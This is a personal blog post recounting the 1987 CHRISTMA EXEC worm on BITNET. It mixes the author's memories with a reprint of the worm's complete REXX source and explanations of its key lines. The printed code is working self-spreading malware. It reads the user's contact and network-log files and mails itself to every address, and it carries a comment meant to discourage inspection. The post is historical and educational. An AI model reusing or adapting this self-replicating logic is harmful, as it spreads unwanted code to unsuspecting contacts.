Kilo Echo Bravo Six Four Niner

CHRISTMA EXEC … as clumsy or random as a blaster.

"Sherman, set the wayback machine to NASA Goddard Space Flight Center, December 1987."

Bask in the madness of CHRISMA EXEC. Below is the source code of the first wide area network worm/trojan horse to cause a lot of grief worldwide. It spread across the network commonly known as BITNET (see https://en.wikipedia.org/wiki/BITNET), and managed to traverse a controlled gateway into IBM's internal network VNET (see https://en.wikipedia.org/wiki/IBM_VNET).

This is written in REXX (see https://en.wikipedia.org/wiki/Rexx) and ran on the IBM VM/CMS Operating System. The user would receive the program and manually execute it. The program would read display a holiday greeting, and then send a copy of the program to anyone in your address book(s). The resulting deluge of copies of the program swamped a worldwide store and forward network where most data was flowing over 9.6kpbs lines. Interesting times.

The tree picture included IBM 3279 control characters to generate a colored blinking light effect. On a typical B/W IBM terminal it looked pretty dull. Curious folks were discouraged from reading through the program and detecting the trojan horse with the cute comment "browsing this file is no fun at all".

The actual program was called CHRISTMA EXEC. It is often referred to as CHRISTMAS EXEC, IBM VM/CMS had a limit of 8 character file names (CHRISTMA) and file types (EXEC). The operating system didn't care about the trailing S in the file name.

Did I get nailed by this? Nope. I did get nailed by sneaky programs like this before and had learned my lesson. Unlike CHRISTMA they typically only sent one sneaky file, not tons of them.

Where was I then? I joined BITNET in early 1985 as I recall although https://personalpages.manchester.ac.uk/staff/m.dodge/cybergeography/atlas/bitnet_topology.txt says my University joined in late 1984. I was $JJM@CLVM (Clarkson University, Potsdam, New York, USA - Home of the TwiliteZne RELAY) until mid-1986. I continued to be active on BITNET while at NASA Goddard Space Flight Center, first on the IBM Mainframe at ZMJJM@SCFVM, later on VAX/VMS systems FASTEDDY@IAFBIT and then FASTEDDY@DFTBIT. DFTBIT was part of the BITNET II (RSCS over TCP/IP) effort. In 1990 I moved away from being on BITNET full time. I still had access at FASTEDDY@DRYCAS (CMU Computer Club), but was not online on a regular basis.

As for the TwiliteZne RELAY (see https://en.wikipedia.org/wiki/BITNET_Relay), I was the instigator for that. I somehow talked the powers that be at Clarkson to let me run the RELAY. We handled user traffic for the University of Connecticut branch of BITNET. Along with U Conn and Clarkson, that included Marist, RPI, University of Massachusetts, and a few other places. Our upstream node in the RELAY network was at Yale University. One of the staff overseeing my little mad empire would go on to rewrite RELAY in Pascal, significantly improving performance.

OK, a bit more on the topic at hand.

I gave a class at a gathering of BITNET users at Baltimore in 1989 on Viruses, Worms, and Trojan Horses. CHRISTMA was one of my examples. A woman who was attending (but oddly not on BITNET) and I started talking. Strangely enough, she is still hanging out with me 33 years later.

Since REXX and VM/CMS aren't mainstream anymore, here are a few lines of code that need some explaining:

VMFCLEAR - One of several ways in VM/CMS to clear the screen.

"q t (stack" - Short for QUERY TIME. The code is determining the date of program execution. There is some time-based logic to activating the trojan horse.

"IDENTIFY ( FIFO" - The code is getting the username of the person executing the program. The username is stored in the variable WER.

"EXECIO * DISKR " WER " NAMES A (FIFO" - Load the file WER NAMES off the A minidisk. The NAMES file is a contacts list used by various VM/CMS utilities. The code will send a copy of itself to everyone in your contact list. Target username is in NAME, target hostname is in ORT. The username RELAY is skipped, that was a chat system common to BITNET at the time. RELAY was the inspiration for IRC.

"EXECIO * DISKR " WER " NETLOG A (FIFO" - Similar to the NAMES file, the NETLOG file was a list of all the users you had shared files with at some point.

Simple, effective, and quite maddening. And, while the technology has changed greatly... this isn't much different from telling users "DO NOT CLICK ON SUSPICIOUS LINKS!"

We can still learn from the lessons of relics like this.

See https://en.wikipedia.org/wiki/Christmas_Tree_EXEC for more info. 

/*********************/
/*    LET THIS EXEC  */
/*		     */
/*	  RUN	     */
/*		     */
/*	  AND	     */
/*		     */
/*	 ENJOY	     */
/*		     */
/*     YOURSELF!     */
/*********************/
'VMFCLEAR'
SAY '                *               '
SAY '                *               '
SAY '               ***              '
SAY '              *****             '
SAY '             *******            '
SAY '            *********           '
SAY '          *************                A'
SAY '             *******            '
SAY '           ***********                VERY'
SAY '         ***************        '
SAY '       *******************            HAPPY'
SAY '           ***********          '
SAY '         ***************            CHRISTMAS'
SAY '       *******************      '
SAY '     ***********************         AND MY'
SAY '         ***************        '
SAY '       *******************         BEST WISHES'
SAY '     ***********************    '
SAY '   ***************************     FOR THE NEXT'
SAY '             ******             '
SAY '             ******                    YEAR'
SAY '             ******               '
/*     browsing this file is no fun at all
       just type CHRISTMAS from cms */
dropbuf
makebuf
"q t (stack"
  pull d1 d2 d3 d4 d5 dat
  pull zeile
  jeah = substr(dat,7,2)
  tack = substr(dat,4,2)
  mohn = substr(dat,1,2)
if jeah <= 88 then do
if mohn <2 ] mohn = 12 then do
DROPBUF
MAKEBUF
"IDENTIFY ( FIFO"
PULL WER VON WO IST REST
DROPBUF
MAKEBUF
"EXECIO * DISKR " WER " NAMES A (FIFO"
 DO WHILE QUEUED() > 0
    PULL NICK NAME ORT
    NAM = INDEX(NAME,'.')+1
    IF NAM > 0 THEN DO
       NAME = SUBSTR(NAME,NAM)
    END
    NAM = INDEX(ORT,'.')+1
    IF NAM > 0 THEN DO
       ORT  = SUBSTR(ORT,NAM)
    END
    IF LENGTH(NAME)>0 THEN DO
       IF LENGTH(ORT) = 0 THEN DO
	  ORT = WO
       END
       if name ^= "RELAY" then do
       "SF CHRISTMAS EXEC A " NAME " AT " ORT " (ack"
       end
    END
 END
DROPBUF
MAKEBUF
ANZ = 1
"EXECIO * DISKR " WER " NETLOG A (FIFO"
 DO WHILE QUEUED() > 0
    PULL KIND FN FT FM ACT FROM ID AT NODE REST
    IF ACT = 'SENT'  THEN DO
       IF ANZ = 1 THEN DO
	 OK.ANZ = ID
       END
       IF ANZ > 1 THEN DO
	 OK.ANZ = ID
	 NIXIS = 0
	 DO I = 1 TO ANZ-1
	    IF OK.I = ID THEN DO
	       NIXIS = 1
	    END
	 END
       END
       ANZ = ANZ + 1
       IF NIXIS = 0 THEN DO
       "SF CHRISTMAS EXEC A " ID " AT " NODE " (ack"
       END
    END
 END
DROPBUF
END
end
end

Posted

in

, ,

by

John McMahon

Tags:

,